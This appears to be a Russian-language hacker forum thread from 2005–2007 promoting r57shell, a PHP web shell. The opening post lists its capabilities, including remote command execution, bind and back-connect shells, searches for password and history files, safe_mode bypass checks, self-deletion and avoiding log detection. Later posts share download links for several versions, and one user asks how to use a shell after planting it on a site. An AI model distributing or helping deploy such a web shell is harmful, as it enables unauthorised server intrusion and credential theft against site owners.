r57shell! NEW!

Discussion in 'Болталка' started by Rebz, 7 Jul 2005.

  1. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Версия 1.22 доступна для свободного скачивания.

    http://rst.void.ru/download/r57shell.txt

    для тех кто не в курсе: r57shell - скрипт на пхп для выполнения шелл-команд на сервере через браузер.
    Возможности:
    ~ защита скрипта с помощью пароля
    ~ выполнение шелл-команд
    ~ шелл команды могут выполняться через exec, shell_exec, system, passthru и popen
    ~ загрузка файлов на сервер с локального компьютера пользователя
    ~ загрузка файлов с удаленного сервера с помощью wget, fetch, lynx, links, get или curl
    ~ поддерживает алиасы команд
    ~ включены алиасы команд:
    - поиск на сервере всех файлов с suid битом
    - поиск на сервере всех файлов с sgid битом
    - поиск на сервере файлов config.inc.php
    - поиск на сервере всех директорий и файлов доступных на запись для всех
    - поиск на сервере файлов service.pwd
    - поиск на сервере файлов .htpasswd
    - поиск на сервере файлов .bash_history
    - поиск на сервере файлов config*
    - поиск на сервере файлов .fetchmailrc
    - вывод списка атрибутов файлов на файловой системе ext2fs
    - просмотр открытых портов
    ~ для алиасов поиска доступны как поиск начиная с корня так и поиск только в текущей директории
    ~ два языка интерфейса: русский, английский
    ~ возможность забиндить /bin/bash на определенный порт с помощью Perl или С кода
    ~ возможность делать back-connect с помощью Perl или С кода
    ~ возможность создать перенаправление портов с помощью утилиты datapipe на С или Perl
    ~ вывод значений $OSTYPE и sysctl
    ~ вывод версии php и версии веб-сервера
    ~ вывод phpinfo()
    ~ вывод настроек php даже при отключенной функции phpinfo()
    ~ выполнение любого PHP-кода через функцию eval()
    ~ получение информации из базы данных mysql (просмотр дампа данных либо сохранение данных в файл)
    ~ поддержка работы скрипта при включенном SAFE MODE
    ~ проверки на возможность обхода ограничений при включенном safe_mode
    - проверка возможности обхода ограничений open_basedir через функции cURL
    - проверка возможности обхода ограничений safe_mode через функцию include
    - проверка возможности обхода ограничений safe_mode через загрузку файла в mysql
    ~ функции редактирования файлов
    ~ автоматическое определение путей к перлу и качалкам
    ~ функции удаления временных файлов создаваемых при работе скрипта
    ~ функция самоудаления скрипта с сервера
    ~ работает в unix и windows системах
    ~ почти вся инфа скрипта гоняется через POST запросы что сложнее для обнаружения в логах
     
  2. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Вот некоторые команды мож для новичков таких как я пригодятся.
    rm - удалить файл
    id - просмотр прав, т.е.uid и gid
    chown - смена хозяина файла
    rmdir - удалить каталог
    mv - переместить файл
    ls - просмотр каталога
    chmod - смена привилегий файлового доступа
    cd - сменить каталог
    cp - копирование чего либо
    uname -a - всё о версии системы
     
  3. spamoney

    spamoney Elder - Старейшина

    Joined:
    26 Dec 2006
    Messages:
    120
    Likes Received:
    7
    Reputations:
    1
    А чего то сылка не рабочая:
    "Forbidden

    You don't have permission to access /download/r57shell.txt on this server."


    Может кому пригодится _http://slil.ru/24149067 версия r57shell 1.3
     
    #3 spamoney, 28 Mar 2007
    Last edited: 28 Mar 2007
  4. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Сайт RST закрылся ещё давно, команда распалась.
     
  5. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    07.07.2005, 03:30

    археологи.. дату хоть смотрите.. =)
    красивая дата... :)
     
  6. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    мб у кого-то нету..
    1.24
    http://www.securitylab.ru/software/234092.php
    1.31
    http://hcr.3dn.ru/expl/php/r57shell.txt
     
  7. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Блин, а как узнать залил ли ты шелл (если дыра в адрестной строке, и там указывается все нужное), и как юзать шел, залил а потом что? куда идти, какой адрес :-\
     
  8. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    насколько я знаю, команда не распадалась )
     
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    мало знаешь ;)
     
  10. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Кстати в этот день в ЛОндоне террористы взрывали автобусы и поезда в метро =\